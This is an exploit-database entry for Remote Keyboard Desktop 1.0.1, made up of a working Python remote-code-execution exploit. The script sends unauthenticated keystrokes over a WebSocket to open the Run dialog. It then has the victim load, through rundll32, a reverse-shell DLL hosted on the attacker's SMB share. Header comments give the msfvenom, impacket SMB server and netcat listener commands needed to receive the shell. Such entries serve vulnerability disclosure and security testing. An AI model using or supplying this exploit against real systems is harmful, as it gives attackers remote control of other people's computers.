Exploit Details
Basic Information
| Exploit Title | Remote Keyboard Desktop 1.0.1 – Remote Code Execution (RCE) |
|---|---|
| Exploit ID | EDB-ID:52299 |
| Type | exploitdb |
| Published | 2025-05-21T00:00:00 |
| Modified | 2025-05-21T00:00:00 |
CVSS Information
| CVSS Score | 0.0 |
|---|---|
| Severity | NONE |
| Vector | NONE |
CVE Information
Exploit Description
Exploit Code
# Date: 05/17/2025
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://remotecontrolio.web.app/
# Software Link: https://apps.microsoft.com/detail/9n0jw8v5sc9m?hl=neutral&gl=US&ocid=pdpshare
# Version: 1.0.1
# Tested on: Windows 10 Pro Build 19045
# Start Remote Keyboard Desktop on your windows
# Preparing:
#
# 1. Generating payload (dll/exe):
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.8.105 LPORT=8080 -f dll > shell.dll
# 2. Start smb server: impacket-smbserver SHARE . -smb2support
# 3. nc -lnvp 8080
# 4. python exploit.py
#####
#!/usr/bin/env python3
import websocket
import json
import time
target = “192.168.8.105”
lhost = “192.168.8.101”
WS_URL = f”ws://{target}:8080/”
payload = “shell2.dll” # payload dll/exe filename
debug = False
HEADER_LIST = [
“User-Agent: Dart/3.7 (dart:io)”,
f”Origin: http://{target}:8080″,
“Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits”
]
#SMB_PATH = f”cmd /c \\\\{lhost}\\SHARE\\{payload}” # exe based
SMB_PATH = f”rundll32.exe \\\\{lhost}\\SHARE\\{payload},ExportedFunc” # dll
based
special_mapping = {
‘ ‘: (“SPACE”, False),
‘/’: (“NUMPAD_DIVIDE”, False),
‘\\’: (“\\”, False),
‘.’: (“NUMPAD_DECIMAL”, False),
‘,’: (“,”, False),
}
def send_key_event(ws, key, key_down):
event = {“command”: “keyboard_event”, “data”: {“key”: key, “keyDown”:
key_down, “capsLock”: False}}
ws.send(json.dumps(event))
def send_text(ws, text, delay=0.05):
shift_pressed = False
for ch in text:
if ch in special_mapping:
key_name, need_shift = special_mapping[ch]
elif ch.isalpha():
need_shift = ch.isupper()
key_name = ch.upper()
elif ch.isdigit():
key_name = ch
need_shift = False
else:
raise ValueError(f”No key mapping for character: {ch!r}”)
if need_shift and not shift_pressed:
send_key_event(ws, “SHIFT”, True)
shift_pressed = True
elif not need_shift and shift_pressed:
send_key_event(ws, “SHIFT”, False)
shift_pressed = False
send_key_event(ws, key_name, True)
send_key_event(ws, key_name, False)
time.sleep(delay)
if shift_pressed:
send_key_event(ws, “SHIFT”, False)
def send_key(ws, keys, delay=0.05):
for key in keys:
send_key_event(ws, key, True)
time.sleep(delay)
for key in reversed(keys):
send_key_event(ws, key, False)
def on_open(ws):
print (“Let’s start!”)
send_key(ws, [“LEFT_WINDOWS”, “R”])
time.sleep(0.5)
send_text(ws, SMB_PATH)
send_key(ws, [“RETURN”])
print (“Executing…”)
time.sleep(1.2)
print(“Check your listener!”)
if debug:
print(“\033[42;37mExploit by blue0x1 – github.com/blue0x1\033[0m
“)
ws.close()
def on_message(ws, message):
if debug:
print(“[=] Received:”, message)
def on_error(ws, error):
if debug:
print(“[!] Error:”, error)
def on_close(ws, code, reason):
if debug:
print(f”[x] Closed: {code} – {reason}”)
if __name__ == “__main__”:
websocket.enableTrace(debug)
ws = websocket.WebSocketApp(
WS_URL,
header=HEADER_LIST,
on_open=on_open,
on_message=on_message,
on_error=on_error,
on_close=on_close
)
ws.run_forever()